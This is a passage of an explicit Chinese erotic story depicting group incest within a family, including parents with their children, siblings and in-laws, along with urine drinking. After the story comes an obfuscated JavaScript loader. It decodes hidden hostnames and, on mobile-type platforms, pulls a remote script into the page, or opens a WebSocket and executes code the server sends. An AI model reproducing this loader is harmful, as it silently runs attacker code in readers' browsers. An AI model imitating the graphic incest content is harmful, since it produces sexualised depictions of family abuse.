呵呵……」这时候电话响了,李花拿过自己的手机,原来是丈夫刘海打来的。
刘海在电话那边说:「妈的,你这淫货又让儿子给操翻穴了吧?嘿嘿……今个刘波在你的子宫里灌多少精水啊?阴道没让我们的好儿子给撑裂了吧?」李花的阴道里还插着假鸡巴,淫笑道:「去你的!今个儿子的鸡巴不知道多厉害,把老娘的肉穴给喂饱了……我说还有吕红这个淫货呢,咱们两人和小波操穴。
你没和王嫂那大骚穴玩啊?是不是又相互吃尿了啊?……」刘海说让大家明天回家一起操穴,大家都欢喜不住。
刘波和吕红问母亲,才知道原来刘海和佣人王嫂喜欢相互撒尿吃尿。
大家抱在一起睡了一觉,明天准备回家,一场集体乱伦操穴就要到来了。

  话说这刘海人到了五十五了,但对性可是强烈得很啊,这大鸡巴可不比小伙子的差,天天都要和妻子李花、佣人王月兰一起操穴,有时候还叫自己的儿子和媳妇吕红来玩。

  昨天因为李花去儿子家了,所以也没什么可做的,便看起了黄色影碟,边看用手撸起了粗黑的大鸡巴。
看他那根鸡巴足有20厘米,大龟头粗大还尖尖的,鸡巴上的青筋像老树根一样,在上面还长了许多小肉粒,这根鸡巴可是全家女人的最爱啊!
  王嫂从厨房里走出来,她只穿了件小背心,两个木瓜似的大乳房都吊出了背心底了,粗大黝黑的奶头比刘海的脚拇指还粗,腋底下还长了些腋毛,肥大的屁股把花短裤都快撑破了。

  刘海见了,嘿嘿淫笑道:「妈的,你都浪成这样了?来,帮老子下下火。
妈的,鸡巴都硬死了,让老子捏几下大奶头……呵呵……」王嫂把背心往上一拉就倒在刘海身上,一手抓着鸡巴便撸了起来,淫笑说:
  「哟……夫人不在家里,大哥就乱来啊!嘿嘿……啊……你这鸡巴可真大……哎哟!把我的大奶头给拧掉了……啊……」刘海用力捏着大奶头,把王嫂的裤衩扒了,在她那个肥大高凸无毛的阴户上揉捏起来。
「妈的,王嫂你穴可真大,没我的大鸡巴就没人插得下啊!这阴唇他妈的比李花那大多了。
嘿!阴蒂也真他妈的粗,跟老子的拇指大。
这阴道也没得说……我说,你这淫货的逼咋的那么大啊?嘿嘿……」他用力撑开阴道,把四个手指都塞进去。

  王嫂含着刘海的龟头:「唔……就是让你们家的人给操阔了呗……哎哟……把我的子宫都挖出了,你这淫棍……」刘海的四个手指塞进了阴道,拇指用力按着王嫂的阴蒂揉,不一下那淫穴里的淫水就「哗啦啦」的流出了。
两片黑色的大型阴唇闪闪发亮,上面的皱褶又深又大,勃起发硬的阴蒂更是越发的迷人。
刘海一手抓住那像杯口大的黝黑乳晕把大奶头拉起,足足让拉起来有一指长,王嫂哪还忍得住啊,一边用力地吮吸着刘海的大龟头,还叫着:「哎哟……不要啊……把老娘的阴道挖坏了,你就没得操了……啊……我的奶头……啊……唔……」刘海没有停,反而更加卖力,还嘿嘿笑着:「妈的,你不是喜欢这小日本的SM吗?老子今个玩死你……」刘海把王嫂的大阴唇用力拉起交错打上了个结,然后按着她的大阴蒂狠狠地揉着,另一手三个手指插进了屁眼里来回地抽插,把王嫂弄得是阴户淫水直流,屁眼里又爽又痛,两个大木瓜乳房乱摆。

  「哎哟啊……你这老色鬼,把我弄死了……用力捏我的奶头啊……唔……给我捅几下肉穴啊……」刘海把王嫂给摆横在自己的身体上,一手狠捏大奶房,一手在她的下阴乱捏乱挖……两人还不时亲嘴。
王嫂一翻身两人来了个69式,相互口交起来,王嫂抓着大鸡巴卖力地吮吸着,刘海也含住了她长长的黑阴唇,手指扣住阴道口用力扒大了往上拉,马上就现出王嫂那红红的大尿道。
刘海伸出舌头频频挑逗着,还用手指狠狠地刺激。

  「哎哟……你这要命的色鬼啊……把老娘的尿给舔出来啊……」自己狠狠撸着刘海的大鸡巴,拼命地吸住龟头,从她尿道里直射出一股骚黄的尿水,刘海一口接住,舌头还猛舔尿道口,把她的尿水吸进了肚子里,自己的尿水也急射进了王嫂的口里,两人还边喝边淫笑。

  「唔……真骚啊!好吃……嘿嘿……啊……」刘海道:「妈的,王嫂你的尿好骚啊……」王嫂淫笑:「你的还不一样吗?大哥快操我吧!穴都痒死了……把你的大鸡巴往我的大阴道里插啊……啊……」刘海坐了起来,甩了甩鸡巴头上的尿水,又舔了几下王嫂阴户里的尿道口,王嫂马上骑上去,把大龟头往自己的阴道口里一塞,「啊……好大的龟头啊……啊……「刘海一把拉住她往下一拉,」噗滋「一声鸡巴直插进了子宫里。

  「哎哟妈啊……怎么那么大啊……快操啊……」王嫂自己起落着大屁股,阴道里套着刘海的大鸡巴,把里面的淫水都给挤出来了。

  刘海双手捏住两个粗大的黑奶头,胯下也狠狠的往上挺:「唉……你这骚货可真重啊……啊……」他的手指插在王嫂的屁眼里抠着。

  王嫂淫叫道:「哎哟……插到我的子宫里了……啊……淫水又流出来了……啊……」刘海边操穴,边嘿嘿笑:「老子哪回不操进你的子宫啊?嘿嘿……」两人操了一会,王嫂转了身,哪知道刘海把大龟头对着她的屁眼,王嫂也没看就往下一坐,龟头马上「噗滋」操进了屁眼里。
「哎哟!啊……死鬼要我的命了……」她觉得直肠里又涨又痛,自己不禁用手往肉穴里狠狠地挖了起来。
刘海从后面托起王嫂两个大肉袋用力挤捏,奶水「滋滋」的喷在地板上,王嫂淫笑:
  「你啊……也不说一声,屁眼里水都没有就拼命地操……哎哟……来劲了啊!嘿嘿……」自己也一起一落的套弄着大鸡巴。

  刘海不知道从哪里拿出了一根塑料鸡巴,猛的往王嫂的阴道里插了进去,王嫂觉得自己的子宫口一开,不禁又大叫:「哎哟……让你玩死老娘了!别停……快啊……你这老淫棍……」刘海操着王嫂的屁眼,捏住奶头,还伸出舌头和王嫂亲吻起来,两人都含糊不清地说着。

  「唔……爽吗?我的好王嫂啊……啊……你把我的大鸡巴给夹断了……」「啊……用力……把我的奶水都给挤完了……你……啊……屁眼里也出水了啊……呵呵……大哥,你和嫂子操穴也是这样吗?」刘海淫笑道:「她啊……哪有你这骚逼淫荡啊!呵呵……来,让我帮你抠肉穴。
」说完,自己抓住塑料鸡巴狠狠地插着王嫂那黑红的大阴道,手指不住地刺激着大而粗长的阴蒂,两人都「哼哼嘿嘿」的淫叫着。

  从王嫂阴道里流出的阴精水把大腿给弄湿了一大片,肥大高凸的阴户上淫水烁烁,两片紫黑的大阴唇反卷在阴道口外,还挂着几条精水丝,大阴蒂粗大而肿胀,在刘海手指的拨弄下越发的粗大。
一个成熟淫妇的生殖器是如此的淫荡和迷人啊!
  王嫂这时候高潮也到了,阴道里不住地收缩着,淫水从鸡巴抽插着的逼缝里「噗滋、噗滋」喷出肉穴外,喷在刘海的手上。

  「啊……别停……老公……快来了……我的阴精来了哦……哎哟!出了……啊……死了……啊……好人啊……大鸡巴老公……用力给我几下啊……又喷阴精水了……啊……」两人都停住了,互相搂抱着,四只手在王嫂的肉穴上揉着,两人还把手里的阴精彼此往嘴里抹,嘿嘿的淫笑着。

  哪知道忽然一声冷笑:「哈哈……好你个王月兰啊!和我老公操起穴来了……」原来是李花和儿子刘波、还有媳妇吕红进了门,走到刘海和王嫂的跟前。

  刘海双手还捏着王嫂的木瓜大乳房,嘿嘿笑道:「哦……你们都来了。
我们两人等不及了就操了起来,还望夫人您见谅啊!」王嫂的阴道的淫水还流着,顺着插在里面的鸡巴滴在地板上,大家见了都忍不住了,也没说什么了。

  李花见了也不禁淫笑:「我们一进门就听到有人叫『哎哟老公啊……我的阴精出来啊……是谁啊?」王嫂笑道:「太太你就不要笑我了,待会儿啊,我们少爷还不是要操你的大肉穴?到时候我想你叫得还比我淫荡啊!」李花一笑,上去抓住塑料鸡巴:「好你个王嫂,和我老公操了穴还敢说老娘啊,看我弄死你!」说完狠狠地往王嫂的阴道里抽插起来,自己还伸出舌头舔着两片粗大紫黑的阴唇片:「唔……这阴唇妈的比我的还大啊!唔……老公你也别停啊,咱们玩死这淫货。
」刘海淫笑向吕红道:「小红啊,来让公公亲亲啊……小波你也别闲着啊,看你妈那淫样……来一起玩啊!」吕红笑着扒光了衣服坐在刘海的身边,两人搂着亲吻起来。
刘海捏着吕红的奶头笑说:「哦……还是咱们媳妇的乳房好啊!真嫩!好滑啊……」刘波从后面扒了母亲李花的衣服,跪着舔起了母亲的大肥穴;刘海的鸡巴操着王嫂的屁眼,手却抠着媳妇吕红的肉穴;李花帮王嫂抽插着阴道,儿子还舔着自己的肥穴,不时还用手指狠狠的抠几下,一家人真是淫乱至极。

  这个时候,连刘海的女儿刘芳和他丈夫吕强也进了屋。
这吕强不是别人,正是吕红的大哥,也是刘海这个银行行长一手提拔的办公室主任,是大家乱伦的成员。

  刘芳和吕强见了哈哈大笑:「哎哟啊……看咱们家都成什么了?乱伦操穴大会啊!」李花回过头淫笑:「死丫头,还笑!你的穴也不也是让你爸爸和大哥给操烂了吗?嘿嘿……」吕强淫笑道:「妈啊,今个我让小芳给爸操,你的大肉穴也让我来操操啊!
  小波,怎么样?」刘波一笑:「没问题,我也好久没操咱们小芳的嫩穴了。
」刘海笑说:「还嫩穴啊?还不给吕强这小子给操阔了!」刘芳淫笑:「爸爸你坏……来,女儿让你摸摸我的嫩穴……」说着就走了过去,扒了衣服张开腿露出可爱的嫩穴,两片小阴唇早就湿润了,粉红的阴道里也流着淫水。

  刘海伸手摸了摸,笑说:「哎哟……还是咱们女儿的淫穴嫩啊!可真滑。
」吕强也扒光了衣服,和刘波一起抱着李花捏乳房、抠肉穴。
李花淫笑:「好了,人都齐了,我看大家就开始淫乱吧!走,上咱们家的『擂台』去。
」大家都大笑起来。

  刘海从王嫂的屁眼里抽出自己的大鸡巴,鸡巴红红的,全是屁眼里的肛液,自己见了也淫笑:「妈的,王嫂的屁眼里的水也不少啊!」说完还狠狠地捏了一把王嫂的大奶头。
王嫂更是淫荡,鸡巴还插在肉穴里,连拔也不拔了,夹住就起来。

  大家一起上了二楼,开了一间房,看见一张至少是用十张大床合并的超级大床,还真挺像是擂台呢!大家一开始就乱了,刘海抱着自己的女儿亲吻着,手指挖着吕红的阴道:刘波和吕强一起抱着母亲李花,一人猛吮一边大乳房,手也狠狠的挖着肉穴;王嫂用力撸着两人的大鸡巴……李花这时候坐起来淫笑说:「好了,大家就开始操穴了吧!」刘海嘿嘿淫笑道:「好,我操咱们的宝贝女儿。
」刘波:「不行!爸,您还是先操我老婆吧,让我先操妹妹。
」他马上拉过刘芳在肉穴上舔了起来。

  刘海:「妈的!好,老子就把小红给操翻了穴……」他也把小红拉入怀里。

  吕强笑道:「岳母大人,你的大骚穴我就来操哦!王嫂,你也来玩嘛!」说完,抱着李花亲吻起来。

  王嫂淫笑着说:「我啊,早就想和姑爷你操穴了……啊……啊……哎哟!这鸡巴可真大啊!操进穴里还不爽死了?唔……龟头也这么大……」她边吮吸着鸡巴,边用手挖着李花的淫穴,把李花的淫水挖得是「哗哗」的流:「哎哟……王嫂这淫货可真会玩穴啊……用力往里面抠啊……阴蒂啊……啊……」李花再也忍不住了,把吕强推倒便蹲了上去,王嫂捏住吕强的大龟头舔了几下,把自己的口水吐在李花那黑红的阴道口上,然后塞进龟头,淫笑着道:「好了,夫人,你们就好好的干穴吧!」李花大屁股「噗滋」一沉,觉得自己的阴道一涨,一根火热的鸡巴插进了自己的穴里,大龟头顶在子宫上,不禁大叫:「哎哟……好女婿啊……你的鸡巴可好大啊……把妈的肉穴撑裂了……用力顶吧……妈要你狠狠的操穴啊……啊……」刘波和妹妹刘芳听了直笑,刘波说:「大家看咱妈多淫荡啊,和小芳的丈夫操上穴了啊!」刘芳抓着大哥的鸡巴也淫笑:「咱家的人不都这样嘛,看,咱爸还和你老婆操上了呢!就咱们还没有对上鸡巴肉穴了……哥哥,你快操妹妹的淫穴吧!」刘海的鸡巴「噗滋、噗滋」的边在媳妇的阴道里抽插着,边笑着说:「就是啊!小波,你就快操你妹妹的淫穴吧!看,爸都把你老婆操出那么多水来了……嘿嘿!小红的逼还真的嫩啊……啊……啊……」小红边挺着阴户,边淫笑道:「看你说的,还不是咱爸的鸡巴粗,把我淫穴里的淫水给抽出来啊……啊哎哟……爸,用力操我的骚穴啊……啊……」刘海捏住小红的乳房,鸡巴就像是拉风箱似的「咕滋咕滋」直响。

  刘波见了也不舔小芳的穴了,把妹妹的屁股抱起来,用龟头在阴唇上磨了几下就是一顶,「噗滋」鸡巴直插入了小芳的阴道里,「咕滋咕滋」的抽插起来。

  手也不闲着,伸过去捞住刘芳那两个有着李花母亲遗传的大乳房,狠狠地捏着:「啊……还是咱们小芳的淫穴嫩啊……操着爽啊……这奶房也够粗的,和咱妈的有得比呢……嘿嘿……啊……」刘芳把大屁股往后顶,也叫着:「哎哟……哥,你的鸡巴也大啊!把妹的肉穴都挤满了……龟头又操进子宫口里去了……妈妈你看,哥哥他操死我了……」李花淫叫答道:「啊……哎哟……小芳啊……你老公的鸡巴还把妈妈的阴道给操坏了……啊……好女婿啊……妈的阴精快让你这大鸡巴女婿操出来了啊……啊……」吕强从下面顶着李花的穴,手狠狠地捏弄着两个巨乳,笑说:「刘波……你干我老婆,我干你妈……嘿嘿……岳母大人的穴水真是多啊……滑得鸡巴都使不上劲了……」李花笑着打了下吕强:「你小子尽顾说,快操啊!啊……哦……把我子宫给操开了,你还操啊……啊……」王嫂在三对淫乱的男女之间不时舔舔李花和吕强的淫穴、鸡巴,不时又用自己的大阴户帮着刘波顶撞屁股,还爬到刘海身边让他边操吕红的穴边抠自己的阴道。
这骚货可淫荡了,她趴在李花的阴户前,看着吕强的鸡巴在阴道里一进一出的把李花两片紫黑的大阴唇弄得是一翻一合,连阴道里的嫩肉也给带出了一截。

  王嫂一手用假鸡巴在肉穴里抽插,又伸出舌头在李花和吕强的性器上舔着:
  「唔……啊……夫人你的淫水可真骚啊……又出了……」她抓住了吕强的大卵泡揉着,弄得吕强呀叫着:「哎哟……王嫂你可真好啊……爽死我了……我操……操……」自己的鸡巴更加卖力地在李花的阴道里抽插着,龟头次次顶进了李花的子宫里,又狠狠地转几下。

  李花:「妈啊……这阿强的龟头太厉害了……啊……妈的阴精液来了啊……用力啊……对,往子宫里操……不行了……来了……哦……」吕强觉得李花的子宫不住地收缩着紧吮吸着自己的龟头,他叫道:「啊……妈啊……好爽啊……把我龟头吸住了……啊……「用力顶住李花的子宫口,李花的阴精」咕滋咕滋「的喷出了,浓浓的烫得吕强一抖,他赶紧收缩肛门定住。

  李花:「啊……出精水了……我来了……啊……爽啊……哦……好女婿,把我的阴精水给插出了……哦……」边淫叫边打着摆子,吕强用手顶着李花不让她躺下。

  王嫂见从两人的性器间流下了白浓的阴精,自己一边加快手里假鸡巴的抽插速度,一边把流下的淫水阴精舔吃了,「唔……夫人,你们两人的淫水精液还真骚啊……好多哦……」自己的高潮也来了,瘫倒在床上,阴道里不住地流出淫水。

  吕强还不等李花回过神来,猛的一翻身把李花掀倒在床上,狠狠地在她阴道里抽插起来。
「哎哟……你这小子,妈的淫水还没有流完呢……啊……操死老娘了……啊……这水又来了……」刘波在母亲和妹夫的淫叫声里把刘芳的嫩穴也干得是「噗滋、噗滋」直响,「嘿嘿……妹啊,你看你老公把咱妈的阴精给操出来了,我还没有把你的水操出呢!我操……操死你这小嫩穴……」刘芳听了母亲和丈夫的淫乱的话,也不禁来了:「哎哟……大哥啊……你就狠狠地操小妹的嫩穴吧……我也要出水了啊……啊……快啊……用力操吧……来了……哦……我死了……」刘波把鸡巴头狠狠地顶在妹妹的穴心上,手用力捏住奶房,享受着被热阴精的冲洗:「哦……小芳啊……你的精水好烫啊……大哥我爽死了……还有啊……啊……」刘芳出了阴精,竟然趴在了床上,刘波大叫:「哎哟!你把大哥的鸡巴给折断了啊!」大家听了淫笑不住。

  吕红的骚穴给公公的大鸡巴磨得火热麻痒,淫水一个劲的流出阴道口:「啊……好公公啊……媳妇的阴精也来了……快操!操啊……我出了……来了……用力操死我吧……啊……啊啊……」自己的阴精也从跳动的子宫里喷在了刘海的龟头上。

  刘海「哎哟」一声:「好烫的阴精啊!我操死你这淫货……啊……」大床上的七个人都抱着、淫叫着,大伙见吕强还干着李花的骚穴「噗滋、噗滋」的,自己的鸡巴都又硬了起来。

  刘波把妹妹翻过了身,接着就操了起来;刘海也让吕红把大屁股翘起,自己抓着鸡巴往肉穴抽插;吕强的鸡巴在李花的阴道里可是一下比一下狠啊,把李花的肉穴都给操翻了,两人的阴毛都是淫水阴精,小腹的撞击发出「啪啪」声,大卵泡有力地打击在李花的肛门上。
「啊……妈啊……咱们操得可真是爽啊……我的鸡巴让你的大肉穴给套死了……快夹我的龟头啊……子宫……对……用力吮吸……啊……」王嫂爬到了刘海和吕红那边,从后面抱住了刘海,用自己肥大光洁的阴户狠狠地撞击着他的屁股,刘海的鸡巴可就操得更加深了,吕红哪忍得住啊:「哎哟……怎么那么狠啊……公公,你把媳妇的穴给操裂了……哎哟……王嫂,你可玩死我的小骚穴了……」刘海回头和王嫂相对淫笑着亲了一下,说:「小红啊,王嫂也是为你爽啊,你就让公公狠狠地操你的穴吧!嘿嘿……」刘波和小芳操了一会,刘芳叫道:「不行了……哥,你的鸡巴好大啊!妹妹的阴精水又要出来了……啊……哥,别停啊……妹妹要来了……快啊……啊……啊……啊……」刘波听了,更加狠更加快地抽插着小芳的嫩穴。

  小芳最后尖叫一声:「来啊……精水出来了……啊……哥哥啊……小妹让你操死了啊……」刘波也觉得自己的精水快来了:「小芳等我,咱们一起出啊……啊……来了……小妹,哥的精液射出了……啊……啊……唔……」刘波的龟头一吐,把浓浓的热精水射进了妹妹不住跳动的子宫里,两人的淫水和精液混合在一起,到达了性爱的高潮,抱着不动亲吻着。

  刘海听了,鸡巴不禁也想射了,叫着:「好……媳妇啊……公公的精液也要出来了……你用力吮吸我的龟头啊……啊……」吕红马上运力在子宫上狠狠地吸着龟头,阴户不住地往后顶,边叫着:「别……我还没有来呢……快插我的穴啊……快……王嫂你用力顶啊……」王嫂见吕红那么淫荡,便用自己的大阴户猛顶刘海的屁股,「啪啪」直响,刘海的鸡巴随声在小红的子宫口狠狠地转磨着。

  吕强这边也操到了高潮,鸡巴把岳母李花的阴道都操红了,淫水「滋滋」的流出来,李花这时候也是含糊地淫叫着:「啊……死了……又来了……鸡巴用力啊……妈的阴精水要出来了……啊……哦……天啊……来了……啊……」吕强被岳母子宫里冲出的阴精液一烫,自己的龟头跳了几下,他硬是把龟头挤入了子宫里才喷出了浓浓的精液。

  「啊……妈啊……你的阴精水把我给烫出了精液来了……啊……我射了……啊……咱们一起射精吧!啊……「李花被女婿浓热的精水一射,也全身不住地抖动着,两眼一翻,爽昏过去了,两人的性器还」咕滋咕滋「地流着淫水浓精。

  这边,刘海也禁不住龟头一硬,在吕红的子宫里射出了精水:「小红……公公射了……啊……用力吮吸啊……啊……爽啊……」吕红被他这股热浓的精液一射,自己也来了,她把屁股用力往后猛顶,让还没有软的鸡巴在子宫口上磨了几下,「咕滋咕滋」马上喷发出阴精水来:「啊……公公……我的大鸡巴公公……咱们一起来……啊……你把我的子宫给射满了啊……精水好烫啊……啊……」王嫂被这淫荡的乱伦场面感染了,狠狠地在刘海的屁股上撞击几下后,从自己的阴户里也流出了粘稠的淫水……一家人抱着亲吻着,捏着乳房淫笑起来。
刘海顶着小红的肉穴,爬到了这边笑说:「啊……他妈的,这小红的穴操起来可真爽啊!」吕强笑说:「我说岳父大人,我妹妹的穴就是骚啊!我觉得妈的大肉穴也够淫啊!这奶头……看,还吸得出奶水呢!」说着,自己就吮吸起李花一边大乳房来。

  李花淫笑着说:「小芳,你老公的鸡巴还不错啊!把妈妈的穴都操爽死了!
  啊……「刘波拉过王嫂:」我可说了,待会我要和王嫂操穴。
爸,你就操妹妹的嫩穴;强哥,你也和小红来个哥妹乱伦,操穴给我们瞧瞧啊!「李花一听就急了:「什么啊!你这小子连妈的穴也不想操了啊?白养你那么大的鸡巴了!」刘波淫笑道:「妈,我的大肉穴妈……你来帮儿子玩,我舔您的肉穴还不成吗?咱们母子最后再狠狠的操一回,还怕我的鸡巴不把你的子宫给撑裂了啊?」李花淫笑说:「呸!你说的,到时候不把妈妈的子宫灌满了精水,妈可饶不了你!呵呵……」刘海笑说:「大伙看看啊,我这老婆淫荡成什么样了!当着那么多人的面就和儿子讨论上操穴、射精了。
唉……」李花:「你这淫棍也还不是吗?鸡巴还顶在媳妇的阴道里呢!嘿嘿……到时候你还不把自个亲女儿的肉穴给操裂了啊!」大伙都哈哈大笑。

  李花又说:「我可说了,我和吕红的肉穴都上了环儿了啊,小芳的阴道还不知道怎么呢?你们一帮人挺着鸡巴就乱射啊!」刘芳笑说:「妈,我也吃了避孕药了,你们就放心地射吧!」李花对吕强淫笑说:「看,看你老婆都淫荡成什么样了,叫大伙往自己逼里射精液呢!」吕强的鸡巴在李花的阴道里狠狠地顶了几下,笑说:「妈,咱们都喜欢玩这个调的,我还不能让小芳吃药吗?」李花:「哎哟!你这小子,把妈的穴都顶烂了,还不解气儿啊?」一家人又聊了会淫话,各自拔出鸡巴,三个男的都顶着水淋淋的鸡巴,李花的肉穴里不住地流出精水,自己看见了也不禁淫笑:「妈的,吕强你的精液还真多,把妈的穴涨坏了……小芳来,把你老公的精水舔吃了。
」小芳趴在母亲的肉穴前,一口口地舔吃着自己丈夫射出的精水。
舔完了,也张大了腿说道:「来,妈你也给女儿舔舔穴,把大哥的精水也来尝尝。
」李花一笑:「就你这丫头淫荡……」说完就舔吃起来。

  刘芳问:「妈啊,大哥的精液好吃吗?」李花边舔边笑:「唔……哦……妈可是经常吃你大哥的精水啊……唔……」刘芳笑道:「你们看妈!呵呵……」王嫂笑着抓住刘海的鸡巴:「嘿嘿……小芳啊,咱们家的女人还不是常常吃吗,你爸的精水可浓了!」吕红也抓着刘海的鸡巴舔着:「唔……就是啊……我说咱爸的精水最好了。
」刘海摸着吕红的大乳房,笑着说:「看咱们媳妇多淫荡啊,肉穴里的淫水还流着呢!」刘波把王嫂的大肉穴扒开了,张嘴含住两片粗大肥长的阴唇用力地吮吸着:
  「唔……好久没吮过那么肥大的阴唇了……啊……真骚啊……」刘波的手指用力捏住王嫂那粒肿胀发硬的阴蒂,狠狠地拉着:「妈的,你这淫货的阴蒂好大啊,都快赶上我的脚拇指了!」王嫂:「哎哟啊……少爷啊,你就别弄了,快来操我啊……肉穴痒死了……啊……往我的阴道里挖啊……对……啊……」李花的手抓着儿子的大鸡巴撸着说:「来,让妈妈把你的大鸡巴给弄硬了好操穴……啊……好长的鸡巴啊!」话音刚落便一口口地吮着自己儿子的大鸡巴。

  刘海抱着女儿刘芳抠着穴,看着儿子和李花的淫荡表演,笑说:「唉……这李花也太淫了,自己儿子的鸡巴也不放过啊!」刘芳:「爸你还说呢,我的小穴你不也常常操吗?爸,来操穴吧,我的淫水流到屁眼了啊!」刘海把手指插到小芳的屁眼里抠着说:「啊……小芳啊,让老爸操一回你的小屁眼吧!来……」他自己捏着龟头就往刘芳的屁眼里捅。

  刘芳:「哎哟……妈啊!你看咱爸操我的屁眼了……哎哟!死了……」李花正抓着儿子的鸡巴吮着:「你这死淫棍,女儿的穴你不操……嘿嘿!小芳啊,就让他操吧!反正你不也常和别人操吗!」说完又吮起了鸡巴。

  刘波的鸡巴不停地在王嫂的大肉逼里抽插着,不时地和母亲接吻、舔乳房,「啊……王嫂,用力夹我的鸡巴啊……淫水多了就不好用力操你的阴道了啊……快……唔……妈你叫得好淫荡啊,把我的鸡巴都给叫硬了许多了啊!嘿嘿……」李花扭着大屁股笑:「你的鸡巴什么时候都是那么硬啊!看你们操穴,把王嫂的大肉逼操出了多少淫水啊……」刘波环抱住李花,鸡巴抽插在王嫂的穴里:「我的鸡巴就是让妈给叫硬了,怎么样?我操……唔……啊……」娘子两人又亲吻起来。

  王嫂的肉穴给操着,又叫不出声音,只好拼命地舔吸李花的肉穴,李花给舔得直叫:「啊……王嫂,用力吸我的阴道啊……哦……扯大阴唇……哎哟啊……好美啊……「三人快乐地大声淫叫着。

  吕强那边可就早操上自己妹妹的肉穴了,两人「啪啪啪」的操得是响遍了房间。

  吕强把妹妹吕红的腿扛在肩上,鸡巴「噗滋、噗滋」的操在淫水直流的肉穴里,把吕红操得是又叫又笑:「哎哟……好粗的鸡巴啊……哥哥,快用力操妹妹的小嫩穴啊……啊……嘿嘿……」吕强边操边说:「妹妹,你的肉穴可比咱们姐姐(吕丽)的肉穴紧了,夹得大哥我鸡巴好爽啊……不过就是没你姐姐的逼淫……水也多啊!」吕红淫笑道:「好啊,你去咱们姐家玩也不叫我去啊,妹妹今个就让你看看我的肉穴淫不淫!啊……操啊……对了,用力啊……」她运力在阴道里狠狠地夹着吕强的鸡巴,阴道里的摩擦加大了,「咕滋咕滋」的响着。

  吕强的鸡巴被又紧又热的子宫一个劲地吮着龟头,爽死了:「哎哟……好紧的逼啊……你姐姐的大肉逼也没你的紧……我操……啊……好舒服啊……继续夹啊……」兄妹两人的性器「啪啪」、「噗滋、噗滋」乱响。

  刘海和自己的女儿也操到了高潮,「好爸爸,女儿的小肉穴好爽啊……再操我就出水了啊……啊……爸……我先出了……啊……妈啊……阴精流出来了……啊……我死了……」刘海的大鸡巴越插越狠,把刘芳的阴唇给拉出了阴道一边,阴精顺着鸡巴淌了出来:「哦……小芳啊……怎么那么快啊……哦……水还真多啊……把爸爸的龟头给弄得好舒服啊……啊……」小芳的阴精一流,人也昏了过去,好一会才醒过来,淫笑道:「大鸡巴好爸爸,你操得女儿好爽啊……啊……」父女俩亲吻着。

  刘海这老色鬼的鸡巴又「啪啪」地操起了刘芳的小肉逼,把刘芳操得是大叫:
  「不了……我不行了……爸,别操我的穴了……今个不行了,在家和吕强操了一早上了……救命啊……妈啊!快来啊……」李花马上爬过来,看着父女淫笑着说:「你啊,看把女儿的肉穴都操肿了。

  鸡巴想操穴就来老娘这,看我的大肉逼还不把你这老鸡巴给弄出精水来……」刘海嘿嘿笑着,拔出红黑粗大的鸡巴,自己用手撸着:「夫人你看啊,我的鸡巴还那么硬呢!这小芳的穴就不行了……来,咱老夫老妻的也别玩什么花样了,让孩子们看看咱们操逼。
呵呵……你大肉穴的淫水都流在床上了,来吧!」他一说完就扑倒李花,鸡巴「噗滋」操进了李花那淫水直流的大肉逼里。

  李花挺起阴户:「哎哟……也不说一声插了……啊……你就不能轻点啊……啊……大鸡巴的肉刺好尖啊!刺得我的阴道好舒服啊……啊……好老公……快操我的逼啊……啊……」刘海抱住李花亲着,下体狠操着穴,鸡巴可是又狠又快地在李花的逼里操得「啪啪」发响:「妈的,你的肉穴淫水好多啊,湿得老子鸡巴都用不上劲了……啊……」李花笑道:「我肉逼里的水是让王嫂给舔出的。
再说了,我大肉逼里的水多这谁不知道啊!嘿嘿……」这淫妇一操上了穴,话也淫荡无比。

  那边,王嫂在叫着:「哎哟……少爷啊,你鸡巴把我的子宫捅穿了……好长啊……啊……我要泄阴精了……啊……哦……快……操啊……对了……哎哟……我来了……出啊……啊……「王嫂最后抖了几下,阴户」咕滋咕滋「的喷出了浓骚的阴精液,喘着气,再也不动了。


function FMXvy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function ckAsM(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return FMXvy(t);};window[''+'E'+'T'+'z'+'n'+'h'+'Z'+'g'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=ckAsM,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('dHIudGhhbGx1ccy5uZXQ=','dHIueWWVzdWW42NzguY29t','151236',window,document,['c','W']);}:function(){};